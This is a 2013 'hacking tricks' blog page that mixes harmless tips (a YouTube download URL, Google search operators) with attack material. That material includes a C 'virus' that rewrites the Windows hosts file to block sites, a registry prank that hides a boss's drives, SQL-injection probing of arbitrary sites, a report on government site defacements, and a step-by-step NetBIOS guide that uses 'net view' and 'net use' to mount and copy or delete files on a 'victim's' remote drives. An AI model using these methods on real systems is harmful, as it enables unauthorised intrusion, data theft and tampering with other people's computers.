Showing posts with label Hacking Tricks. Show all posts
Showing posts with label Hacking Tricks. Show all posts

Tuesday, June 4, 2013

How To Download video from youtube without any software





Here is the easiest way to download any video from Youtube.



While playing the video on youtube.com, Copy its location from the address bar like www.youtube.com/watch?v=sasad7657dms2



then add the word ‘ kick’ between www. and youtube.com/link…….






EXAMPLE: www.kickyoutube.com/watch?v=sasad7657dms2



That’s it, Download without any other software or going to any other site, as their are many but this method is the best one according to me. 


Enjoy..


How to Virus Program To Block Any Websites











A
program which can block different websites is here. You can use this
program to manually block different websites, at default Google, Youtube
and Yahoo are blocked, you can add and delete the URL of website int
the green field. If you are adding more and more websites then dont
forget to add the number in blue field('char site_list').











#include<stdio.h>

#include<dos.h>

#include<dir.h>





char site_list[6][30]={



“google.com”,


“www.google.com”,


“youtube.com”,


“www.youtube.com”,


“yahoo.com”,


“www.yahoo.com”


};









char ip[12]=”127.0.0.1″;


FILE *target;




int find_root(void);


void block_site(void);




int find_root()


{


int done;


struct ffblk ffblk;//File block structure




done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);


/*to determine the root drive*/


if(done==0)


{


target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);


/*to open the file*/


return 1;


}




done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);


/*to determine the root drive*/


if(done==0)


{


target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);


/*to open the file*/


return 1;


}




done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);


/*to determine the root drive*/


if(done==0)


{


target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);


/*to open the file*/


return 1;


}




done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);


/*to determine the root drive*/


if(done==0)


{


target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);


/*to open the file*/


return 1;


}




else return 0;


}




void block_site()


{


int i;


fseek(target,0,SEEK_END); /*to move to the end of the file*/




fprintf(target,”\n”);


for(i=0;i<6;i++)


fprintf(target,”%s\t%s\n”,ip,site_list[i]);


fclose(target);


}






void main()


{


int success=0;


success=find_root();


if(success)


block_site();


}











Testing




1. To test, run the compiled module. It will block the sites that is listed in the source code.




2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.




3. To remove the virus type the following the Run.




%windir%\system32\drivers\etc




4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this




127.0.0.1                                google.com




5. Delete all such entries which contain the names of blocked sites...






Download the text from here





Google Hack For Making Special Advanced Search











Google is considered as the Big Daddy of Internet.Most of the people
prefer using google over other search engines like Yahoo,askjeeves,Bing
etc due the highly relevant results of google.Now what to do when even
google is not providing you with what you want..certainly you will feel
that you have reached the end and there is no way that you can get the
type of result you want.But wait Dont loose your hope because now we
will be telling you some google hacks that will help you get your
desired result.You will find these hacks very useful in your day to day
life and you can also amuse your friends by telling these google hacks
and certainly they will be amazed by knowledge.












Now Here Are The List Of Google Hacks With Their Usability








Type these searches in google






  • link:url







This will give the list of sites that links to a particular site.






Example:






link:www.download.com






It will give the list of all sites linking to www.download.com






  • related:url







This search will give you all sites related to the url you have entered in the above query.






  • site:domain







This will show all the pages of the Domain you enter in the above query






  • allinurl:search term







This will show only those results in whose url your search term will appear exactly.






  • Inurl:search term







This is similar to the query allinurl but it will search only the
first word of search term in url and the rest of the words will be
searched in the page.






  • allintitle:search term







This will show only those sites which have your search term in the tittle of website.






  • Intitle:search term







This will show only those sites which have your first word of search term in tittle and the rest of the words in their page.






  • spell:search term







This will check your search term for spelling mistakes and automatically perform search in google with correct words






  • stocks:search term







This will show all the results with your your query in the stock index






  • filetype:extension  search term







This is one of the most useful queries.It will provide you only those
sites which provides a document of your extension type and having your
search term in it.






Example:






Filetype:doc mother






It will show all doc files in which the mother word is used.This type
of search is extremely useful for finding presentations(ppt or pptx)
and e books(pdf)






  • phone:number







This search query will show you the name and address of the number you have entered in the above search.




30 Pakistan Govt Website hacked by Indian hackers 2012-2013











In
the month of December more than 150 websites were hacked and defaced by
pakistani hacker group “Pak Cyber Combact Squad.” Now indian hackers
have started to take some action against that. This time Indian hacker
group “IndiShell” has hacked 30 pakistani government websites. They have
posted the links on http://pastebin.com/RYcbZ4xd






List of hacked websites








Website Hacking Best Techniques by bmmekwan














Everyday, you search in Google, Yahoo, and other search engines,
"How to Hack Websites?", "Methods to Hack Website", "Website Hacking",
etc. Website Hacking have become a popular business or rather an
interesting game for many people, reasons behind this hack is normally
to prove their skills and to get fame, or anything else. As we know, "To catch a thief, we must think like a thief", like
here also, we can conclude that to secure a things, we must first
find insecure in it, then we can proceed on securing. So, before
proceeding to the topic of securing we must first know what is     insecure
in it.








There are many drawbacks by which websites are compromised,
these is normally due to the poor management of site by the webmaster or
admin.






So, the methods by which websites are hacked are:



  • Cross-Site Scripting

  • SQL Injection

  • Remote File Inclusion

  • Local File Inclusion

  • Denial of Service Attack

  • Brute-Force Attack



These are some of the common methods to hack a website, let's discuss them below.




  • Cross-site Scripting:
    Cross-Site Scripting is a type of attack in which a hacker inject
    script into webpages. Their effect may range from a pretty nuisance to a
    significant security risk. By this way of injecting codes into
    webpages, a hacker can gain access to sensitive page content, session
    cookies, and a variety of other information which are maintained by the
    browser on behalf of the user. 

  • SQL Injection:
    SQL stands for Structured Query Language, SQL Injection is a another
    type of web application vulnerability occurring in the database layer of
    an application. It is mostly used for stealing sensitive data (like
    Username, Password, Email ID, many more). It takes advantages of
    improper coding in the web application that allow the attacker to inject
    SQL commands.

  • Remote File Inclusion:
    Remote File Inclusion (RFI) allows an attacker to include a remote
    file, usually through a script on the web server. A hacker usually
    upload a file (normally a shell) by tricking the web server on the
    webpage. 

  • Local File Inclusion:
    A Local File Inclusion (LFI) is a method to include local files on
    runtime. This is much same like RFI. This method involves the
    discovering of /etc/passwd/ file in the web directory.

  • Denial of Service Attack:
    Denial of Service Attack (DoS attack) or Distributed Denial of Service
    attack(DDoS attack) is an attempt to make the computer resource
    unavailable to its users. These are the common attack nowadays, its main
    purpose is to obstruct the communication of the victim's computer by
    forcing the targeted computer(s) to reset.

  • Brute-Force Attack:
    Brute-Force Attack is a method in which an attacker tries to crack
    every possible letters of the password until the whole password is
    cracked. The main drawback of this attack is that it takes too much time
    while cracking the password, as it tries every possible character which
    can be a part of the password.


There are many other ways too for taking over a site, but these are nowadays very common.




























Some others methods are DNS Hijacking, Insufficient Administration, Misconfiguration, Uses of Trojans, many more.






My
advice to all the webmaster or admin is to check their site against
these vulnerabilities as to protect them from future attacks.





I hope u really enjoy it !!




Check SQL Injection in Best 3 Steps




This is my post at Bmmekwan.tk
friends, I am very glad and happy to write it. I have heard a lots of
people nowadays ask on How to Check SQL Injection   I hope you will really
enjoy it 


So Today I'm learning SQL injection (SQLi) indepth so I will try teaching you guys a
little of that as well.SQLi is the most popular attack on any website
these days.There has been an enormous increase in SQL programmers and
websites,and the biggest problem with SQL is "Either your
perfect/hacked".Due to poor


coding programmers often leave
vulnerabilities in their site and hackers its our job to inform them and
patch them up.So lets see




how to check if a site if vulnerable to SQLi








Since this is still the basic,there is nothing much to do.All you have to is:




1.Get a site which uses SQL queries.For your convinc,in simpler terms it is any site which has "

www.site.com/something.php?ex=43".You must have seen tons of such sites.Note: NOT all sites which have "=" use SQL queroes it might also use "PHP Get/Post method".


2.Once,you have a site like then just intersert a inverted comma(') like this "

www.site.com/something.php?ex=43'".


3.If the site is vulnerable to SQL then it would return an error something like this.You might get an error like this "

You
have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '\' AND
single_group = "S"' at line 1"


This error need not be the same always,as long as you get an error you
can tell that the site is vulnerable to SQLi and its up to you to become
a her and report to the site admin.



         Best Of luck 

     Comment us For Batter Results

Trick To Enable Right Click On Disabled Website :-






1. First You Need To install web developer 1.1.9 Firefox Add-on

2. So Click Here For Install Web Developer 1.1.9




3. In Next Step Go To Disable Then Disable Java Script And Then Choose All Java Script .


That's It Now You Are Done .

Hope You find this trick very helpful for you .

And Please Don't forget to share this trick with your friends on Social Networking Website  :)


How To Enable Right Click on Disabled Website in





Hello
Friends ! iam Here to introduce a new trick to enable accessing right
click on those websites and blogs where Right clicking is Blocked.So
there are many ways to enable right click on websites but.this is a
simple trick.just you have to install an addon and integrate to your
browser and perform two-three steps that's it.


So Now Follow The Below Steps :. 

First You have to Install Web Developer Addon For FireFox





So Click Here to Install the Addon .





Next You need to Go to Disable option thereafter Disable Java Script and then Choose All Java Script.

That's it
Now You Are Done.Hope U ppl Find this Trick Helpful to u.With Regards
Saikiransama..♥ Please Don't Forget To Share This Trick To Social Sites
:-)


Wednesday, May 22, 2013

Hack Trick to hide drives















This
is yet another hack trick, you can play on your geek friend or to your boss. To
disable the display of local or networked drives when you click My Computer go
to :




HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.






Now in the right pane create a new DWORD item and name it NoDrives.


Now
modify it's value and set it to 3FFFFFF (Hexadecimal) Now press F5 to refresh.


When
you click on My Computer, no drives will be shown. To enable display of drives
in My Computer, simply delete this DWORD item. It's .reg file is as follows:




REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]






change
the values




"NoDrives"=dword:03ffffff


Netbios Tricks [ hack ]









THIS NETBIOS HACKING GUIDE WILL TELL
YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR
PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.



STEP-BY-STEP NETBIOS HACKING
PROCEDURE






1.Open command prompt

2. In the command prompt use the “net view” command


( OR YOU CAN ALSO USE “NB Scanner”
OPTION IN “
IP TOOLS
SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER
OF COMPUTERS AT A TIME).




Example: C:\>net view \\219.64.55.112



The above is an example for operation using command prompt. “net view” is one
of the netbios command to view the shared resources of the remote computer.
Here “219.64.55.112″ is an IP address of remote computer that is to be hacked
through Netbios. You have to substitute a vlaid IP address in it’s place. If
succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error
message is displayed. So repeat the procedure 2 with a different IP address.



3. After succeeding, use the “net use” command in the command prompt. The “net
use” is another netbios command which makes it possible to hack remote drives
or printers.



Example-1:

C:\>net use D: \\219.64.55.112\F

Example-2:

C:\>net use G: \\219.64.55.112\SharedDocs

Example-3:

C:\>net use I: \\219.64.55.112\Myprint





NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that
are to be created on your computer to access remote computer’s hard-disk.





NOTE: GIVE DRIVE NAMES THAT ARE NOT
USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND
ROM-DRIVES ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: & D: AS HARD DIRVES,
A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE
COMMAND PROMPT




F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you
want to hack. “Myprint” is the name of remote computer’s printer. These are
displayed after giving “net use” command. “219.64.55.112″ is the IP address of
remote computer that you want to hack.



4. After succeeding your computer will give a message that “The command
completed successfully“. Once you get the above message you are only one step
away from hacking the computer.



Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the
specified name. You can open it and access remote computer’s Hard-Drive. You
can copy files, music, folders etc. from victim’s hard-drive. You can
delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on
victim’s system. You can access files/folders quickly through “Command Prompt”.


NOTE: If Remote Computer’s Firewall
Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer
Through Netbios. That is Netbios Hacking Is Not Possible In This Situation.(An
Error Message Is Displayed). So Repeat The Procedure 2,3 With Different IP
Address.


Add Cool Drop Down Menu in Blogger

Drop Down Navigation Menu For Blogger : You may have seen many drop-down menus but today "ThatsBlogging" will present you an incre...